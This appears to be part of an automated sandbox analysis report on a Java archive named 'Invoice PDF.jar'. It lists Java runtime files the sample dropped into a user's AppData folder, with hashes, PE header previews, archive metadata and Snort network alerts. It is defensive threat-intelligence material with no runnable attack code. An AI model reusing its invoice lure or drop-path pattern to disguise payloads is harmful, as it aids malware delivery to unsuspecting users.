                                                                                                                                                                                              MD5:89FFE1C55ECA478EB147CAE6452E4E5D
                                                                                                                                                                                              SHA1:568237B73667C1CBB1DEC349E71DC4BB8C0BF433
                                                                                                                                                                                              SHA-256:EB4A811A4BE7820B8C43D923B447D6D356141B7B82A372C13E0B5524D504FB29
                                                                                                                                                                                              SHA-512:8BAD680D0CF79CCBDB4C355B40BB9BBE00E12A37FE3705F6529F67C618F9E640E89E70EF982EDD071E93CDA017D0BBAA58B912F45B4D66D6D2B0F33AB96DD4CB
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3...w.x^w.x^w.x^...^v.x^l..^u.x^l..^u.x^l..^u.x^~..^r.x^w.y^[.x^l..^y.x^l..^v.x^l..^v.x^l..^v.x^Richw.x^........PE..L.....\...........!.........................0...............................p............@..........................7.......2..P....P...............(..x....`..`....0..............................`1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...h....@....... ..............@....rsrc........P......."..............@..@.reloc.......`.......&..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\j2pkcs11.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):53112
                                                                                                                                                                                              Entropy (8bit):6.5535314618132645
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:1536:/+BduP0Ds762bvlcfNpJ2jApICRrZT9ixHCWaBo/vu0rV9LrBH1bjPEwhEdheBws:/+/ucibSfF2jRksWpJNG
                                                                                                                                                                                              MD5:739F1EDB0882495179258424D34B7F33
                                                                                                                                                                                              SHA1:1AFB3000419BAED6F3D9E7A6DD638B5A448E4066
                                                                                                                                                                                              SHA-256:0E889F5159CA3C24E162CE3D786E5E3FA7A9794376D9E16251E3C76885352FA7
                                                                                                                                                                                              SHA-512:94CF49FE6A5D089B4FA751FFC4C8C8AD75FD788E607A7F49B6BDE1D1256CAF301A1AD834CFCFD084BCC261CAA253FA1C50B7B1082114E04B5FAFE991BFDE26F8
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O^;w.?U$.?U$.?U$.G.$.?U$...$.?U$.?T$&?U$...$.?U$...$.?U$...$.?U$...$.?U$...$.?U$...$.?U$Rich.?U$........................PE..L.....\...........!.....z...8......\.....................................................@.........................p...u...\...<.......................x..............................................@............................................text...nx.......z.................. ..`.rdata...'.......(...~..............@..@.data...............................@....rsrc...............................@..@.reloc..|...........................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\jaas_nt.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):20344
                                                                                                                                                                                              Entropy (8bit):6.3904490465869035
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:4qGHJW0MQYLRVvWIE0PVlKsogj+zst8JN77hhZutH:4xHmQYN8kdQpgj+AK3hDuJ
                                                                                                                                                                                              MD5:A7ECC63FA2B4E44DD472ECB0F8123A95
                                                                                                                                                                                              SHA1:D2796DAAF3FF8072776310D845C09E5B5A2DA4FE
                                                                                                                                                                                              SHA-256:DE4E517272D8438072211570EE1E4B53DB44652218917F88B873B1E0E56CE93D
                                                                                                                                                                                              SHA-512:820B001B37B777C8C6BAEC6FE61E163127C192855C1F158E1523BBE896A833581B1E7EC3B2F4156701574B11C9D6DFCE10A655D820E3597BF414A7B618636790
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."..|fl./fl./fl./}.(/dl./}.*/gl./}../dl./o.'/al./fl./_l./}../kl./}.//gl./}../gl./}.)/gl./Richfl./................PE..L.....\...........!.........................0...............................p............@.........................@=.......7..d....P...............4..x....`..H....1..............................`6..@............0...............................text............................... ..`.rdata.......0......................@..@.data...`....@.......*..............@....rsrc........P.......,..............@..@.reloc.......`.......0..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\jabswitch.exe
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):31608
                                                                                                                                                                                              Entropy (8bit):6.4517990036237896
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:768:pHhfWinfwUFAvnbETIUh+naSOu91VQ5yj+p3hsHV:Huin5FAvoTIUh+nb1VQ5Jp3hsHV
                                                                                                                                                                                              MD5:8778B12BCD40FF36BD4377D6D448BE29
                                                                                                                                                                                              SHA1:2D60AA91BED94C28054307C80020A4CA6DFE3622
                                                                                                                                                                                              SHA-256:F645BE3BA8F0BAFE1BAC89E813E13140D7FBA2112BBFF967D32918D8579BBFA5
                                                                                                                                                                                              SHA-512:CB02B744F9E57145CCB96F1A30838F891912EB5A1499D47B578F09A37D1F470D2B159796B83C4960475D0ED39739923DB344096902A44728D7EB655050C5A5BE
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............I...I...I..HI...I..JI...I..~I...I..GI...I...I..I...I...I..NI...I..II...IRich...I........PE..L.....\.................0...,.......1.......@....@.................................`.....@.................................dR..x....p...............`..x.......t....A...............................P..@............@..p............................text............0.................. ..`.rdata.......@.......4..............@..@.data........`.......N..............@....rsrc........p.......P..............@..@.reloc..p............Z..............@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\java-rmi.exe
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):16248
                                                                                                                                                                                              Entropy (8bit):6.498340727085624
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:GpsxHnDia9TejmSHhV8x5YeCuIj+I118JN77hhKU:GpsxHnVHS/8x5tCuIj+0S3hQU
                                                                                                                                                                                              MD5:BCEDCDCA329C4EB6CF10E970273345DE
                                                                                                                                                                                              SHA1:6CC296055F380BD44170A2D914BC110206B5412F
                                                                                                                                                                                              SHA-256:3D38B8588703546E791E5D05664187B2343700978EAEE65544F4982F43649416
                                                                                                                                                                                              SHA-512:BCA0C7BA0D84F0A21CBE2E9DA647A71AD559D4A7B47FD5B12AC3A68A859143BDEE3132F7582D180213CE7DACBF09296BC9C4F8AA79CFAA7FAE5E4714EFDCC215
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R%^.<v^.<v^.<vW..v\.<vEx.v_.<vEx.v\.<vEx.v[.<v^.=vo.<vEx.vJ.<vEx.v_.<vEx.v_.<vRich^.<v........PE..L.....\..................................... ....@..........................`............@..................................#..P....@...............$..x....P....... ...............................!..@............ ...............................text............................... ..`.rdata..z.... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......."..............@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\java.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):126840
                                                                                                                                                                                              Entropy (8bit):6.782112254586264
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3072:RSoAtOm8tlNOY4nnTdLC0/NZ3p71nyIn/8Nw9wrhSGR:RIOmVTdLL4CFOR
                                                                                                                                                                                              MD5:1988319262C8461C0D354D29B7164554
                                                                                                                                                                                              SHA1:1E68F3A3ABF49816380AB577FEADBE2B0F0BC3CF
                                                                                                                                                                                              SHA-256:5043B05638292F0563FD1F79181AECD275D450E5B040DE60CE3426092220B0C0
                                                                                                                                                                                              SHA-512:67677D6D7374FCC887A289653938EBFD1E209155D4671E8819D9CE76EE2E36A5A2CFF191DBAC5CF9C750F186141A5F0C336DFD34379361E06680F582D02FE0D5
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......w...3...3...3...(...4...(./.1...:...5...\./.0...:...2...(...4...3.......(...J...(...2...(...2...(...2...Rich3...................PE..L.....\...........!.................'.......0......................................Hm....@..........................u...B...U..........................x.......,....5...............................S..@............0......lU..@....................text............................... ..`.rdata.......0......."..............@..@.data...............................@....rsrc...............................@..@.reloc..p...........................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\java.exe
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):192376
                                                                                                                                                                                              Entropy (8bit):6.757249265537466
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3072:ZWos+tGEkBbq6D3BdsdRM5xzgglg8S7UnatoTBf3bmjZqMNT2rIWD2:lspTq6Ndsvezdlg8S7watoTB2vi92
                                                                                                                                                                                              MD5:28733BA8C383E865338638DF5196E6FE
                                                                                                                                                                                              SHA1:F3FA35DB0FF65B94E18D0B556A691853BDE0F692
                                                                                                                                                                                              SHA-256:E58109151395D6E8668A750C5D107FC691C7C9D5E488486869AF2A1876B1504A
                                                                                                                                                                                              SHA-512:B6808381E74CBA7501D86D075A84989A8147479DF181EBF87BC0BD275EDCCE28FBC7AE90354E280D201AE6D5F97324A080222CC851C1C45A8DFEA71BA3097FC2
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........+H..E...E...E.L.....E..E....E..E....E......E...D...E..E..{.E..E....E..E....E.Rich..E.........PE..L.....\.....................&......7.............@..........................0............@.................................L*..d.......................x.......$....................................#..@............................................text............................... ..`.rdata...s.......t..................@..@.data....4...@......."..............@....rsrc................8..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\java_crw_demo.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):24440
                                                                                                                                                                                              Entropy (8bit):6.615275730279901
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:xx8xsGjyS/uj1ZrEZBrmnXWftpnPV5mzoqj++UJn8JN77hhDyB:YuSGj1w6O7ndEoqj++UJs3hxK
                                                                                                                                                                                              MD5:F9550DA74A8D197A3DD25C72402E78A5
                                                                                                                                                                                              SHA1:958163C425A227A146E85D1BF8636042944B7C9C
                                                                                                                                                                                              SHA-256:8AC7DA134900362253EBAD2C5C14D69D4DE012BC9ED3F07D04DF333E138439F5
                                                                                                                                                                                              SHA-512:F9A6E5884E7305AF4AB2942A7AF1617B8AC43FEB3267832FBF063C4EE9E903C001AC6606D8EEEDB50DFF87257807007B67C5B9BC7A87CBCE250052F4EEC75FC1
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2..v...v...v.....+.t...m'$.u...v...\...m'&.w...m'..t...m'..{...m'#.w...m'".w...m'%.w...Richv...................PE..L.....\...........!.....*...........4.......@.......................................v....@..........................I..|....E..<....`...............D..x....p.......@...............................D..@............@...............................text....).......*.................. ..`.rdata.......@......................@..@.data...(....P.......:..............@....rsrc........`.......<..............@..@.reloc..^....p.......@..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.cpl
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):162816
                                                                                                                                                                                              Entropy (8bit):6.478081267870417
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3072:c82bFfGMMHcwDKadNV8zQLnjZqMNE+BP:cRttMHc2KadPZvj
                                                                                                                                                                                              MD5:23D4CE9539D97E3A82B26F64AFE51934
                                                                                                                                                                                              SHA1:6DE0D6B53CE0658108A8A7BADFA3D0803B276E0B
                                                                                                                                                                                              SHA-256:BDE45AC8606CE62AA0F7A8DC8EC6DA591664FB37B4A4B883E1792F8B564187B4
                                                                                                                                                                                              SHA-512:54CF98D3F53E4259574169F110521655D9E1ED8F1F18C77D6842175F88A213BBDD4AD56A6D55D68E685E25D9742532F2C49E5834756BB9FC2D4BED3432BF58FA
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d2.. S.. S.. S..;.;.9S..;....S..)+6.)S.. S...S..O%..(S..;....S..;.>.!S..;.?.!S..;.8.!S..Rich S..........................PE..L...?.\...........!.....v... .......w....................................................@.............................Z.......d.... ..........................l...`...................................@............................................text...@u.......v.................. ..`.rdata...L.......N...z..............@..@.data...l3..........................@....rsrc........ ......................@..@.reloc...............^..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.exe
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):74616
                                                                                                                                                                                              Entropy (8bit):6.341209283577633
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:1536:SgmG2haDkdWIJ7OkUVq7qjh3rmKPNdTB63hvc:ZE+bgOkINjZqMNdl2c
                                                                                                                                                                                              MD5:3FAC97B1ED8915100DF8EE90AE06D890
                                                                                                                                                                                              SHA1:8F667F8427739A8DAD4E389A48CB0DE173B80171
                                                                                                                                                                                              SHA-256:40BAB5330D940D10090C1023B89CF5825906FB64DF719A25A970D681B6AED676
                                                                                                                                                                                              SHA-512:EDDB42AC47002960FBE805EF5503456815F6D4FCA1C49DD73D05095D23B92FCC0B42C166067D9029AD77B56A6E95B2AB9C678A656ADDCB5D104FA6708C5D9F5C
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]._...1...1...1..8....1.....1..8....1..8....1......1...0...1.v....1..8....1..8....1..8....1.Rich..1.........PE..L...W.\.................F..........:G.......`....@..........................@............@.................................P...x.......................x....0..4...0b..............................0|..@............`...............................text....D.......F.................. ..`.rdata.../...`...0...J..............@..@.data................z..............@....rsrc................|..............@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):58744
                                                                                                                                                                                              Entropy (8bit):6.606153663376911
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:1536:wiEA4Ynzgz8R2tRsC7RH5UfJTT8Om6YxJou53h628:wi0QR2tN7AfF8d6Y8ua28
                                                                                                                                                                                              MD5:B5C38AA2C91CAACCC19233B5B7837C6F
                                                                                                                                                                                              SHA1:5B9D8BC150CDDA3DCB555DC06D4B13D6FFA7F143
                                                                                                                                                                                              SHA-256:B21D8168D28F8C5D2A5D98F56A2A3D0327331E2C2602A58A8538A0CD2CD2FD46
                                                                                                                                                                                              SHA-512:2795927F40ACC03910F025860E91B3F5FDED1B7E601BD4B4A50EBE6264DDFAE06575CDBA6350C18EB6681015F1634FEE948B9627FA004D431EFD8AABD0ACEFB7
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................Q........+......Q.......Q.......Q..............................h.......h.......h.......h.......h.......Rich............PE..L......\...........!.....p...\.......s...............................................G....@............................x...h...........................x.......X.......................................@...............@............................text....n.......p.................. ..`.rdata...E.......F...t..............@..@.data...............................@....rsrc...............................@..@.reloc..X...........................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font_t2k.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):469880
                                                                                                                                                                                              Entropy (8bit):6.604403913705833
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6144:p3kxh6DqypODvUXai0jdbdRCqBjA7dB1stHs1ngVc/T6yF9HvofFGMReiDR8R/bq:2A26uhi4dbdRCqC7duanV/bPodGS2e9X
                                                                                                                                                                                              MD5:0D6DF3B9A303E92B798F977890E1895A
                                                                                                                                                                                              SHA1:1207E665BBE6E308757B042F415C59FEE5B3D414
                                                                                                                                                                                              SHA-256:05EC925EEDAA7C3E69AD0EA98ECF4D43CE14377B8786F6C5AEC722FBABB443A4
                                                                                                                                                                                              SHA-512:0747EBF613E282CE996EBD0BEC42BDDAF6747E340FF86EDE85068F6867559DD94170A061D2FBE41051AF04E919A511FA9D1F21048B89511C8976598CE51C9DE1
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.H.#.&.#.&.#.&.*../.&...'.!.&....'.&...%.&.&...#.6.&...".(.&.P.'.$.&.#.'.q.&..."...&...#.x.&...&.".&....".&...$.".&.Rich#.&.................PE..L......\...........!................}........0...............................P............@......................... ...................................x.... ..\&......................................@............0..H............................text............................... ..`.rdata......0......................@..@.data...............................@....rsrc...............................@..@.reloc..\&... ...(..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\javafx_iio.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):138616
                                                                                                                                                                                              Entropy (8bit):6.577168169432668
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3072:tA5ee6KcqOOWm96dhkO8LuuKBnVrp4gutFHNsB:tA5AK7OQQfkVLuuurOtFuB
                                                                                                                                                                                              MD5:6C5EE1974EBA4858EE1021A9121F16A6
                                                                                                                                                                                              SHA1:1C17AF0F40767480C2334D94425E37F76D4CCDDD
                                                                                                                                                                                              SHA-256:559C5D9F513503158380E1D34B41659C4D0DEE3CCBD08CEF653964CD18A54B19
                                                                                                                                                                                              SHA-512:A9E8A0E6EF34717290CC1321FC5002CA3F8DB5FF8B4BE4A5BF96C82DB5DAC546E398FBBACB916D05290DDDF9058DE3937E04F9DA7D5EF3A8E46FC0AD877105A3
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y.E.=.+L=.+L=.+L4..L7.+L.*M?.+LN.*M>.+L=.*L..+L.(M<.+L..M6.+L./M6.+L./M..+L.+M<.+L..L<.+L.)M<.+LRich=.+L........PE..L......\...........!.........D......m........................................@...........@.........................0.......,........ ..................x....0..........................................@............................................text.............................. ..`.rdata...2.......4..................@..@.data...............................@....rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):192376
                                                                                                                                                                                              Entropy (8bit):6.761593244493689
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3072:p0o+iwdnP6ngIsIC18pVwUM0NldXnSsohU4TBfHqKjZqMN6wVzQQY:p0eg6ZsICYwUJzdXnSpU4TBdvD2QY
                                                                                                                                                                                              MD5:4BFEB2F64685DA09DEBB95FB981D4F65
                                                                                                                                                                                              SHA1:CD4007094CD1D9792CEDBE699502FB15D9BD370A
                                                                                                                                                                                              SHA-256:A181BEFBC33B658305498CDAFF3EDA6512701003BF7144C8E95E953D2638A933
                                                                                                                                                                                              SHA-512:A41BB47CF769BA474B4B43B4BC312E8C542922AFF5913AD10DF02F2C834B7E7C349767A420311A92FF1A8721C62176CE5CA879847C3DB5DC789129F7611AFA56
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........v...%...%...%..w%...%.7D%...%.7q%...%..|%...%...%...%.7E%*..%.7u%...%.7r%...%Rich...%........................PE..L.....\.....................&......V.............@..........................0............@.................................L*..d.......................x.......$....................................$..@............................................text............................... ..`.rdata...s.......t..................@..@.data....4...@......."..............@....rsrc................8..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\javaws.exe
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):300408
                                                                                                                                                                                              Entropy (8bit):6.458865739115016
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6144:a29mYzedYNAMeo/0/3/A//FE/FzdXoktv/PE:hFCmNAMeo/0/OtE/F1tvk
                                                                                                                                                                                              MD5:F64595565AB90F21992D5964BE538A1B
                                                                                                                                                                                              SHA1:DBBC1CCBCAE1EFCA698B9B1A38D9413A0C655F1C
                                                                                                                                                                                              SHA-256:6E38C8F64E2EEA1454A69921083602B18EDE7BE0FB44816D9FD90C4409E3AE52
                                                                                                                                                                                              SHA-512:ADED74B21D8803FB4693DB2229CE2CAB0B5E2D01A387DE605235A82DA641C6CC51ECF575958CBD9EEB6CEC8715CBDFD5C1C882A130AC5059888C3310E57FCC1D
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........,.o...o...o....[..o....n..o....V..o...o...o....o..o....n..o...._..o....X..o..Rich.o..........PE..L.....\............................^k............@..................................Y....@.................................pJ..x....P...............z..x........"...................................5..@....................F.......................text............................... ..`.rdata...x.......z..................@..@.data........`.......J..............@....rsrc........P......................@..@.reloc.../.......0...J..............@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\jawt.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):14712
                                                                                                                                                                                              Entropy (8bit):6.303771574688693
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:192:abn4VZqXr5Yc3XLPVlD6tR4MbL1tJx+w0fH0JOqsmVgz28WhBqoB:auWNb7PVlmNj+V8JN77hhVB
                                                                                                                                                                                              MD5:DC9B3CC131B7CDB14BAA0B6CCCAFFB1F
                                                                                                                                                                                              SHA1:D55A1D7DB43B95475EA48D1C68E4BD38EF2CB2BB
                                                                                                                                                                                              SHA-256:50E59D9C8F497A4D68B181F408747BBF32E84DFFBB2FD78F954495B584FFCD3A
                                                                                                                                                                                              SHA-512:C2A1A1A052BA6F025D0D704C97E2CAED2BC3B2C72D1474CB62A3F7EE8D4A09F4FC32B6214D86977473B347332E9A1AFF121A359A88A7F20F5E602C4B3091F483
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........X"._9LR_9LR_9LRD..R^9LRD..RS9LRD..RZ9LRVA.R]9LR_9MR|9LRD..R\9LRD..R^9LRD..R^9LRD..R^9LRRich_9LR........PE..L.....\...........!......................... ...............................`............@..........................&..J...\"..P....@..................x....P..@.... ...............................!..@............ ...............................text............................... ..`.rdata..Z.... ......................@..@.data...`....0......................@....rsrc........@......................@..@.reloc..t....P......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\jdwp.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):165752
                                                                                                                                                                                              Entropy (8bit):6.723497100208418
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3072:Gc5WVPoRd/N1841YIzfmt6YY7jkmzGBkeUiuXb89Dhg3hL1m:ioD/N1RfDFnhe1pDm3nm
                                                                                                                                                                                              MD5:478CB1C0BF491026C012782BEDCBFBA7
                                                                                                                                                                                              SHA1:98E46DA57BF33874FB5E24DE9ED309F430145C96
                                                                                                                                                                                              SHA-256:0BC86567EF9D466E367A0B8DF633108CE2785487ECA84D073A3DA491153A6CFB
                                                                                                                                                                                              SHA-512:DAB2E9BDAD513A0E548E1BA7C622807F29DFE0F663DA6823E61844BB1FE9BF969BA7903E882708A675D8693FF8D73B6B5274352221072FA3473F65E0C30F0894
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........#..cp..cp..cp...p..cp...p..cp.D.p..cp..bp..cp.D.p..cp.D.p..cp.D.p..cp.D.p..cp.D.p..cp.D.p..cpRich..cp........................PE..L.....\...........!......................................................................@..........................O..h...,J..<....p...............l..x........)..@................................H..@...............,............................text...h........................... ..`.rdata..8`.......b..................@..@.data...0....`.......8..............@....rsrc........p.......<..............@..@.reloc..B+.......,...@..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                              Static File Info

                                                                                                                                                                                              General

                                                                                                                                                                                              File type:Zip archive data, at least v2.0 to extract
                                                                                                                                                                                              Entropy (8bit):7.990033848936036
                                                                                                                                                                                              TrID:
                                                                                                                                                                                              • Java Archive (13504/1) 62.80%
                                                                                                                                                                                              • ZIP compressed archive (8000/1) 37.20%
                                                                                                                                                                                              File name:Invoice PDF.jar
                                                                                                                                                                                              File size:658679
                                                                                                                                                                                              MD5:903b63e35bf8738809eab0f187027daf
                                                                                                                                                                                              SHA1:257ff2ca9d7848e7c411790c3fa88a0aea479079
                                                                                                                                                                                              SHA256:bdfe705deebedf2b4edd1fee5bb225f3a14718f0a1007553fec5050db0f7fe08
                                                                                                                                                                                              SHA512:2c2145d002020579a5717ab480d0689a71428fe69366de525d68da28c048fc7bbc6068608113756c55164932edaf8700118e9a6c8158c3902b7a0a20f0a03638
                                                                                                                                                                                              SSDEEP:12288:ivKyI6KN6nZsWz9vzuEvQL4J5QkJKHxM4B/7Ztjk8BePEYXT:ly3KUnWK9v65e5QwKHxBB9tjJedXT
                                                                                                                                                                                              File Content Preview:PK........wJ.R...b..........$.lxrqyapglo/resources/ljtemfaohk.. ...........5.75...]..75...]..75.......:r-x.~..}s.8.9....p..O...%BEp..p...P.E..KbI.;..'...n{&.bfv.W.J....+.J$x.......e...........f:_....?...........{.?.....=........i.........~....T......../..

                                                                                                                                                                                              File Icon

                                                                                                                                                                                              Icon Hash:d28c8e8ea2868ad6

                                                                                                                                                                                              Network Behavior

                                                                                                                                                                                              Snort IDS Alerts

                                                                                                                                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                              04/19/21-23:32:52.341651ICMP384ICMP PING192.168.2.693.184.221.240
                                                                                                                                                                                              04/19/21-23:32:52.376656ICMP449ICMP Time-To-Live Exceeded in Transit84.17.52.126192.168.2.6
                                                                                                                                                                                              04/19/21-23:32:52.377227ICMP384ICMP PING192.168.2.693.184.221.240
                                                                                                                                                                                              04/19/21-23:32:52.412491ICMP449ICMP Time-To-Live Exceeded in Transit5.56.20.161192.168.2.6
                                                                                                                                                                                              04/19/21-23:32:52.412799ICMP384ICMP PING192.168.2.693.184.221.240
                                                                                                                                                                                              04/19/21-23:32:52.454981ICMP449ICMP Time-To-Live Exceeded in Transit81.95.15.57192.168.2.6
                                                                                                                                                                                              04/19/21-23:32:52.455423ICMP384ICMP PING192.168.2.693.184.221.240
